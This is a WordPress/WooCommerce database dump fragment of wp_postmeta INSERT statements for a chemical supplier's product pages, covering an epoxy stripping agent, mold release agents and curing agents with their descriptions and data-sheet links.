INSERT INTO `wp_postmeta` VALUES (12968, 1149, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12969, 1149, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12970, 1149, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12971, 1149, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12972, 1149, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12973, 1149, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12974, 1149, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12975, 1149, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12976, 1149, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (12977, 1149, '_ywtm_title_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (12978, 1149, '_ywtm_content_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (12979, 1149, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12980, 1149, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12981, 1149, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12982, 1149, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12983, 1149, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12984, 1149, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12985, 818, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12986, 1151, '_wp_attached_file', '2016/09/epoxy-stripping-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12987, 1151, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3200;s:6:"height";i:3200;s:4:"file";s:33:"2016/09/epoxy-stripping-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"epoxy-stripping-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"epoxy-stripping-agent-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"epoxy-stripping-agent-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"epoxy-stripping-agent-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"epoxy-stripping-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"epoxy-stripping-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"epoxy-stripping-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"epoxy-stripping-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12988, 1152, '_edit_lock', '1498848786:3'); 
INSERT INTO `wp_postmeta` VALUES (12989, 1152, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12990, 1153, '_wp_attached_file', '2016/09/MS-111.doc'); 
INSERT INTO `wp_postmeta` VALUES (12991, 1152, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12992, 1152, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12993, 1152, '312_default_editor', '<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Physical Properties</strong></td>\r\n<td style="text-align: center;" width="206"><strong> MS-111</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Color</td>\r\n<td style="text-align: center;">Light to Dark Amber</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">40°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">340 mmHg @ 20°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">1.25g/cc @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Form</td>\r\n<td style="text-align: center;">Liquid</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12994, 1152, '716_default_editor', '<span style="text-decoration: underline;"><strong>Directions for Use: </strong></span>\r\nVent containers carefully to equalize pressure and pour material carefully at room temperature to avoid splashing\r\n\r\n<strong>Coatings:</strong> MS-111 may be applied with a brush containing only non-plastic bristles and handle.  When film has lifted, either scrape or rinse with alcohol.  A second application will occasionally prove necessary.\r\n\r\n<strong>Castings:</strong> Place object to be stripped in tank, cover with liquid, and allow to stand until plastic has disintegrated or loosened.  This will vary from minutes to days depending on casting thickness.  Remove with a hook or basket.  Flush with clean alcohol.'); 
INSERT INTO `wp_postmeta` VALUES (12995, 1152, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12996, 1152, '318_custom_list_file', 'a:1:{s:32:"179b249a19f50f706e493ebe1557eec9";a:3:{s:4:"name";s:6:"MS-111";s:4:"file";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111.doc";s:4:"desc";s:10:"MS-111 TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (12997, 1152, '317_default_editor', 'Quart, Gallon, 5 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12998, 1152, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12999, 1152, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13000, 1152, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13001, 1152, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13002, 1152, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13003, 1152, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13004, 1152, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13005, 1152, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13006, 1152, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13007, 1152, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13008, 1152, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13009, 1152, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13010, 1152, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13011, 1152, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13012, 1152, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13013, 1152, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13014, 1152, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13015, 1152, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13016, 1152, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13017, 1152, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13018, 1152, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13019, 1152, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13020, 1152, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13021, 1152, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (13022, 1152, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13023, 1152, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13024, 1152, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (13025, 1152, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (13026, 1152, '_ywtm_content_tab_description', 'MS-111 Epoxy stripping agent will readily soften and strip most organic systems, such as epoxies and polyurethanes.  It will not attack any metal surfaces or valuable parts during the time necessary to remove polymers.  Caution: It may darken stainless steel and aluminum.  Our formulations are 100% nonflammable.\r\n\r\n<strong>DIRECTIONS FOR USE:</strong>Vent containers carefully to equalize pressure and pour material carefully at room temperature to avoid splashing and boiling.\r\n\r\n<strong>Coatings:</strong> MS-111 may be applied with a brush containing only non-plastic bristles and handle.  When film has lifted, either scrape or rinse with alcohol.  A second application will occasionally prove necessary.\r\n\r\n<strong>Castings:</strong> Place object to be stripped in tank, cover with liquid, and allow to stand until plastic has disintegrated or loosened.  This will vary from minutes to days depending on casting thickness.  Remove with a hook or basket.  Flush with clean alcohol.\r\n\r\n<strong>STORAGE: </strong>MS-111 should be stored at or below room temperature in a glass or polyethylene container, which should be covered tightly to retard evaporation.  MS-111 should be used as soon as practicable and not stored for prolonged periods in other than original container or glass.  Keep tightly sealed.\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (13027, 1152, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13028, 1152, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13029, 1152, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13030, 1152, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13031, 1152, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13032, 1152, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13033, 1154, '_wp_attached_file', '2016/08/MS-460H_462H.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13034, 620, '318_custom_list_file', 'a:1:{s:32:"edeac308e2fe072b1fee54e0c6f9fdff";a:3:{s:4:"name";s:7:"MS-460H";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-460H-462H.pdf";s:4:"desc";s:11:"MS-460H TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13035, 732, '318_custom_list_file', 'a:1:{s:32:"edeac308e2fe072b1fee54e0c6f9fdff";a:3:{s:4:"name";s:7:"MS-462H";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-460H-462H.pdf";s:4:"desc";s:11:"MS-462H TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13036, 1155, '_wp_attached_file', '2016/08/MS-470C_472C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13037, 735, '318_custom_list_file', 'a:1:{s:32:"bc6b3ea4e2c964f50ab1e50b920023ed";a:3:{s:4:"name";s:7:"MS-470C";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C_472C.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (13038, 736, '318_custom_list_file', 'a:1:{s:32:"e560d596446e9ae661c9ce43148190d1";a:3:{s:4:"name";s:7:"MS-472C";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C_472C.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (13039, 1156, '_wp_attached_file', '2016/08/MS-470S_472S.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13040, 190, '318_custom_list_file', 'a:1:{s:32:"eaefde642af7844accc6028ec62744ba";a:3:{s:4:"name";s:7:"MS-470S";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S_472S.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (13041, 738, '318_custom_list_file', 'a:1:{s:32:"eaefde642af7844accc6028ec62744ba";a:3:{s:4:"name";s:7:"MS-472S";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S_472S.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (13043, 1158, '_wp_attached_file', '2016/08/MS-470C_472C-2.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13044, 1159, '_wp_attached_file', '2016/08/MS-465C_467C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13045, 733, '318_custom_list_file', 'a:1:{s:32:"9e33cae5755426095939002c7892a5cc";a:3:{s:4:"name";s:6:"MS-465";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-465C_467C.pdf";s:4:"desc";s:10:"MS-465 TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13046, 1014, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13047, 1015, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13048, 734, '318_custom_list_file', 'a:1:{s:32:"39fa74e86e4183aaa7da5598783e73c8";a:3:{s:4:"name";s:7:"MS-467C";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-465C_467C.pdf";s:4:"desc";s:11:"MS-467C TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13049, 1160, '_wp_attached_file', '2016/08/MS-475C_477C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13050, 621, '318_custom_list_file', 'a:1:{s:32:"ce524b544a554cd9246d0d8a78e2fe28";a:3:{s:4:"name";s:6:"MS-475";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-475C_477C-2.pdf";s:4:"desc";s:10:"MS-475 TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13051, 637, '318_custom_list_file', 'a:1:{s:32:"02c6164ca219cca89fe04df6255abf1b";a:3:{s:4:"name";s:7:"MS-477C";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-475C_477C-2.pdf";s:4:"desc";s:11:"MS-477C TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13052, 1161, '_wp_attached_file', '2016/08/MS-452N.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13053, 622, '318_custom_list_file', 'a:1:{s:32:"8b7c1a5016a21980a22dc983b6c1b1ba";a:3:{s:4:"name";s:7:"MS-452N";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-452N.pdf";s:4:"desc";s:11:"MS-452N TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13054, 1162, '_wp_attached_file', '2016/08/MS-114C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13055, 623, '318_custom_list_file', 'a:1:{s:32:"4f09f65bb2cabb0788372e9395ab94cf";a:3:{s:4:"name";s:7:"MS-114C";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-114C.pdf";s:4:"desc";s:11:"MS-114C TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13056, 575, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13057, 575, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13058, 400, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 82 is formulated to provide unmatched utility and economy in compression and transfer molding, particularly with Rubber to Metal bonding. ReleaSys 82 is compatible with the following materials:\r\n<table style="height: 95px;" width="556">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Plastics</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          Fluorosilicones</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Nitrile</td>\r\n<td width="168">•          SBR</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Chlorinated Polyethylene</td>\r\n<td width="168">•          Natural and Synthetic Rubber</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (13059, 400, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13060, 297, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 8200 is formulated to provide unmatched utility and economy in compression and transfer molding, particularly with Rubber to Metal bonding. ReleaSys 8200 is compatible with the following materials\r\n<table style="height: 142px;" width="636">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Plastics</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          Fluorosilicones</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Nitrile</td>\r\n<td width="168">•          SBR</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Chlorinated Polyethylene</td>\r\n<td width="168">•          Natural and Synthetic Rubber</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (13061, 297, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13062, 293, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 8500 is formulated to provide unmatched utility in injection and transfer molding with the following materials\r\n<table style="height: 68px;" width="473">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Plastics</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (13063, 293, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13064, 419, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 85 is formulated to provide unmatched utility in injection and transfer molding with the following materials:\r\n<table style="height: 48px;" width="413">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Plastics</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (13065, 419, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13066, 423, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 88 is formulated to provide unmatched utility in compression, injection and transfer molding with the following materials: <a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">For help with application or troubleshooting concerns while using ReleaSys.</a>\r\n<table style="height: 114px;" width="410">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Organic Polymer</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Thermo-Resins</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Neoprene</td>\r\n<td width="168"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (13067, 423, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13068, 290, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 8800 is formulated to provide unmatched utility in compression, injection and transfer molding with the following materials <a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">For help with application or troubleshooting concerns while using ReleaSys.</a>\r\n<table style="height: 96px;" width="454">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Organic Polymer</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Thermo-Resins</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Neoprene</td>\r\n<td width="168"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (13069, 290, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13070, 310, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 8900 is formulated to provide unmatched utility in compression, injection and transfer molding with the following materials. <a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">For help with application or troubleshooting concerns while using ReleaSys.</a>\r\n<table style="height: 64px;" width="640">\r\n<tbody>\r\n<tr>\r\n<td width="167">•       Organic Polymer</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Thermosetting resins</td>\r\n<td width="168">•          Elastomers (Natural and Synthetic)</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Neoprene</td>\r\n<td width="168">•          Melamine</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (13071, 310, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13072, 1067, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13073, 1164, '_edit_lock', '1474651584:3'); 
INSERT INTO `wp_postmeta` VALUES (13074, 1164, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13075, 1165, '_wp_attached_file', '2016/09/3030.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13076, 1164, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13077, 1164, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13078, 1164, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13079, 1164, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13080, 1164, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13081, 1164, '318_custom_list_file', 'a:2:{s:32:"38838d511363f5becb69fce89218be3b";a:3:{s:4:"name";s:12:"EPIKURE 3030";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3030.pdf";s:4:"desc";s:16:"EPIKURE 3030 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13082, 1164, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13083, 1164, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13084, 1164, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13085, 1164, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13086, 1164, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13087, 1164, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13088, 1164, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13089, 1164, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13090, 1164, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13091, 1164, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13092, 1164, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13093, 1164, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13094, 1164, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13095, 1164, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13096, 1164, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13097, 1164, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13098, 1164, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13099, 1164, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13100, 1164, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13101, 1164, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13102, 1164, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13103, 1164, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13104, 1164, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13105, 1164, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13106, 1164, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13107, 1164, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13108, 1164, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13109, 1164, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13110, 1164, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13111, 1164, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13112, 1164, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13113, 1166, '_edit_lock', '1474652377:3'); 
INSERT INTO `wp_postmeta` VALUES (13114, 1166, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13115, 1167, '_wp_attached_file', '2016/09/3046.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13116, 1166, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13117, 1166, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13118, 1166, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13119, 1166, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13120, 1166, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13121, 1166, '318_custom_list_file', 'a:1:{s:32:"1cbac9190f5d65f09608bb22dab266f3";a:3:{s:4:"name";s:12:"EPIKURE 3046";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3046.pdf";s:4:"desc";s:16:"EPIKURE 3046 TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (13122, 1166, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13123, 1166, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13124, 1166, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13125, 1166, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13126, 1166, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13127, 1166, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13128, 1166, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13129, 1166, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13130, 1166, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13131, 1166, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13132, 1166, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13133, 1166, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13134, 1166, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13135, 1166, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13136, 1166, '_sale_price', ''); 
